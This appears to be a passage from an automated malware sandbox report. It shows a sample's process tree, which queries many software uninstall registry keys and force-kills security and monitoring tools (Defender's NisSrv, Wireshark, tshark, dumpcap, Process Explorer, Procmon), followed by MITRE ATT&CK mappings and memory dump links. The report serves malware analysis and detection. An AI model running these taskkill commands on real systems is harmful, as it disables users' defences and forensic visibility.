- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4620
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4460
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4092
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:5024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:2732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:1204
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4172
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:1604
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:3048
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4356
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4452
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4200
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:3836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:1496
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:5064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4612
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4116
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4448
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:2364
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:1400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2128
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:1224
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4292
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:3948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:3088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1820
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:4340
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:1976
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4392
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4376
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1020
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1464
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4572
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4752
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4916
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4024
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3552

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2684-79-0x00007FF903170000-0x00007FF903B5C000-memory.dmp

Filesize
9.9MB

Download
memory/2684-87-0x00000227A41B0000-0x00000227A41B1000-memory.dmp

Filesize
4KB

Download
memory/2684-97-0x00000227BE630000-0x00000227BE631000-memory.dmp

Filesize
4KB

Download